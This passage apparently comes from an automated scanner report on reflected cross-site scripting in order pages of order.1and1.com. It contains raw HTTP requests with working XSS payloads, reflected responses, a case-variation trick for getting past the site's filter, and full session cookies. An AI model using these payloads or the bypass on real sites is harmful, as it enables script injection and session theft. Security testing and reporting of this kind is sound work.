Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response 2

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:46:55 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=taV4uMTIoUVFRS3VrcjhwajcpM2xfWTFIOzUdIR4eHRsdMi8vMjErLjIlJyYlIkc1YVZYZh4gG0s7ZXQ6LS4qKS4qKCspIysiISpiYykeJWx1Oy4vKyovLCksJyorJCU=; Expires=Fri, 07-Apr-2079 22:01:02 GMT; Path=/
ETag: 0de3fb6baffce8cb9b37d7e0115e4c0c
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 17448


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...
NO.params.sessionStatus="old";UNOUNO.params.variant="AC:default";UNOUNO.params.project="oneandone_en_us";UNOUNO.params.page="FeatureGuaranteeMoneyback";UNOUNO.params.lastpage="FeatureGuaranteeMoneyback83c9e</ScRiPt ><ScRiPt>alert(1)</ScRiPt>eed4e62047d";UNOUNO.params.articles="1|tariff-beginner-package"};
   //-->
...[SNIP]...

1.8. http://order.1and1.com/xml/order/FeatureMarketingCtrCitysearch [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/FeatureMarketingCtrCitysearch

Issue detail

The value of REST URL parameter 3 submitted to the URL /xml/order/FeatureMarketingCtrCitysearch is copied into a JavaScript string which is encapsulated in double quotation marks at the URL /xml/order/FeatureMarketingCtrCitysearch. The payload 649d3</ScRiPt%20><img%20src%3da%20onerror%3dalert(1)>b5a1ad5a333 was submitted in the REST URL parameter 3. This input was returned as 649d3</ScRiPt ><img src=a onerror=alert(1)>b5a1ad5a333 in a subsequent request for the URL /xml/order/FeatureMarketingCtrCitysearch.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.

Request 1

GET /xml/order/FeatureMarketingCtrCitysearch649d3</ScRiPt%20><img%20src%3da%20onerror%3dalert(1)>b5a1ad5a333;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Request 2

GET /xml/order/FeatureMarketingCtrCitysearch;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response 2

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:45:25 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=QbGExNDUrVFRUTmFXXjtzbTosNm9iXDRLPjggJCEhIB4gHhsbNTQuMTUoKikoJUo4ZFlbaSEjHk4nUWA9MDEtLDEtKy4sJi4lJC1lZiwhKFhhJzEyLi0yLywvKi0uJyg=; Expires=Fri, 07-Apr-2079 21:59:32 GMT; Path=/
ETag: e7dff180f54a2682d8bf1d6892e7732b
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 19187


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...
s.sessionStatus="old";UNOUNO.params.variant="AC:default";UNOUNO.params.project="oneandone_en_us";UNOUNO.params.page="FeatureMarketingCtrCitysearch";UNOUNO.params.lastpage="FeatureMarketingCtrCitysearch649d3</ScRiPt ><img src=a onerror=alert(1)>b5a1ad5a333";UNOUNO.params.articles="1|tariff-beginner-package"};
   //-->
...[SNIP]...

1.9. http://order.1and1.com/xml/order/FeatureMarketingCtrStat [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/FeatureMarketingCtrStat

Issue detail

The value of REST URL parameter 3 submitted to the URL /xml/order/FeatureMarketingCtrStat is copied into a JavaScript string which is encapsulated in double quotation marks at the URL /xml/order/FeatureMarketingCtrStat. The payload ccb50</ScRiPt%20><img%20src%3da%20onerror%3dalert(1)>3147a128d82 was submitted in the REST URL parameter 3. This input was returned as ccb50</ScRiPt ><img src=a onerror=alert(1)>3147a128d82 in a subsequent request for the URL /xml/order/FeatureMarketingCtrStat.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.

Request 1

GET /xml/order/FeatureMarketingCtrStatccb50</ScRiPt%20><img%20src%3da%20onerror%3dalert(1)>3147a128d82;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Request 2

GET /xml/order/FeatureMarketingCtrStat;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response 2

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:45:51 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=TaV4uMTIoUVFRS3VrcjhwajcpM2xfWTFIOzUdIR4eHRsdMi8vMjErLjIlJyYlIkc1YVZYZh4gG0s7ZXQ6LS4qKS4qKCspIysiISpiYykeJWx1Oy4vKyovLCksJyorJCU=; Expires=Fri, 07-Apr-2079 21:59:58 GMT; Path=/
ETag: 1df0b07d9edf1e6d8f16386731fd7196
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 20481


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...
UNOUNO.params.sessionStatus="old";UNOUNO.params.variant="AC:default";UNOUNO.params.project="oneandone_en_us";UNOUNO.params.page="FeatureMarketingCtrStat";UNOUNO.params.lastpage="FeatureMarketingCtrStatccb50</ScRiPt ><img src=a onerror=alert(1)>3147a128d82";UNOUNO.params.articles="1|tariff-beginner-package"};
   //-->
...[SNIP]...

1.10. http://order.1and1.com/xml/order/FeatureSite-buildingCgi [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/FeatureSite-buildingCgi

Issue detail

The value of REST URL parameter 3 submitted to the URL /xml/order/FeatureSite-buildingCgi is copied into a JavaScript string which is encapsulated in double quotation marks at the URL /xml/order/FeatureSite-buildingCgi. The payload 31b1b</ScRiPt%20>c2edeb9151d was submitted in the REST URL parameter 3. This input was returned as 31b1b</ScRiPt >c2edeb9151d in a subsequent request for the URL /xml/order/FeatureSite-buildingCgi.

This behaviour demonstrates that it is possible to can close the open <SCRIPT> tag and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.

Request 1

GET /xml/order/FeatureSite-buildingCgi31b1b</ScRiPt%20>c2edeb9151d;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Request 2

GET /xml/order/FeatureSite-buildingCgi;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response 2

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:44:30 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=5al8vMjMpUlJSTF9sczlxazgqNG1gWjJJPDYeIh8fHhweHDAwMzIsLzMmKCcmI0g2YldZZx8hHEwlZnU7Li8rKi8rKSwqJCwjIitjZCofJlZ2PC8wLCswLSotKCssJSY=; Expires=Fri, 07-Apr-2079 21:58:38 GMT; Path=/
ETag: 59a5f7cd483dbd625b4e3b3399cb425e
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 17070


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...
UNOUNO.params.sessionStatus="old";UNOUNO.params.variant="AC:default";UNOUNO.params.project="oneandone_en_us";UNOUNO.params.page="FeatureSite-buildingCgi";UNOUNO.params.lastpage="FeatureSite-buildingCgi31b1b</ScRiPt >c2edeb9151d";UNOUNO.params.articles="1|tariff-beginner-package"};
   //-->
...[SNIP]...

1.11. http://order.1and1.com/xml/order/FeatureSite-buildingDsc [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/FeatureSite-buildingDsc

Issue detail

The value of REST URL parameter 3 submitted to the URL /xml/order/FeatureSite-buildingDsc is copied into a JavaScript string which is encapsulated in double quotation marks at the URL /xml/order/FeatureSite-buildingDsc. The payload 5a570</ScRiPt%20><ScRiPt>alert(1)</ScRiPt>5c34db446ac was submitted in the REST URL parameter 3. This input was returned as 5a570</ScRiPt ><ScRiPt>alert(1)</ScRiPt>5c34db446ac in a subsequent request for the URL /xml/order/FeatureSite-buildingDsc.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.

Request 1

GET /xml/order/FeatureSite-buildingDsc5a570</ScRiPt%20><ScRiPt>alert(1)</ScRiPt>5c34db446ac;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Request 2

GET /xml/order/FeatureSite-buildingDsc;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response 2

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:42:53 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=dYlcnQUI4YWFhW25kazFpYzAiLGVYUipBNC4tMS4uLSstKygoKyokJyseIB8eG0AuWmZodi4wK1s0Xm0zJicjIicjISQiHCQbMTpyczkuNWVuNCcoJCMoJSIlICMkHR4=; Expires=Fri, 07-Apr-2079 21:57:00 GMT; Path=/
ETag: ea2128c5205999f874b214a18414c18c
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 18755


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...
UNOUNO.params.sessionStatus="old";UNOUNO.params.variant="AC:default";UNOUNO.params.project="oneandone_en_us";UNOUNO.params.page="FeatureSite-buildingDsc";UNOUNO.params.lastpage="FeatureSite-buildingDsc5a570</ScRiPt ><ScRiPt>alert(1)</ScRiPt>5c34db446ac";UNOUNO.params.articles="1|tariff-beginner-package"};
   //-->
...[SNIP]...

1.12. http://order.1and1.com/xml/order/FeatureSite-buildingElements [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/FeatureSite-buildingElements

Issue detail

The value of REST URL parameter 3 submitted to the URL /xml/order/FeatureSite-buildingElements is copied into a JavaScript string which is encapsulated in double quotation marks at the URL /xml/order/FeatureSite-buildingElements. The payload 5314a</ScRiPt%20>fdf961380df was submitted in the REST URL parameter 3. This input was returned as 5314a</ScRiPt >fdf961380df in a subsequent request for the URL /xml/order/FeatureSite-buildingElements.

This behaviour demonstrates that it is possible to can close the open <SCRIPT> tag and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.

Request 1

GET /xml/order/FeatureSite-buildingElements5314a</ScRiPt%20>fdf961380df;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Request 2

GET /xml/order/FeatureSite-buildingElements;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response 2

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:43:47 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=nb2Q0NzguV1dXUWRaYSdfWT0vOXJlXzdOQTsjJyQkIyEjIR4eISAaNDgrLSwrKE07Z1xebCQmIVEqVGMpHB0wLzQwLjEvKTEoJzBoaS8kK1tkKh0eGjA1Mi8yLTAxKis=; Expires=Fri, 07-Apr-2079 21:57:54 GMT; Path=/
ETag: 905cca0b4e9d618ff10d04815b3bba6b
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 20910


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...
ams.sessionStatus="old";UNOUNO.params.variant="AC:default";UNOUNO.params.project="oneandone_en_us";UNOUNO.params.page="FeatureSite-buildingElements";UNOUNO.params.lastpage="FeatureSite-buildingElements5314a</ScRiPt >fdf961380df";UNOUNO.params.articles="1|tariff-beginner-package"};
   //-->
...[SNIP]...

1.13. http://order.1and1.com/xml/order/FeatureSite-buildingPhotogallery [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/FeatureSite-buildingPhotogallery

Issue detail

The value of REST URL parameter 3 submitted to the URL /xml/order/FeatureSite-buildingPhotogallery is copied into a JavaScript string which is encapsulated in double quotation marks at the URL /xml/order/FeatureSite-buildingPhotogallery. The payload 99bea</ScRiPt%20>57d930332ed was submitted in the REST URL parameter 3. This input was returned as 99bea</ScRiPt >57d930332ed in a subsequent request for the URL /xml/order/FeatureSite-buildingPhotogallery.

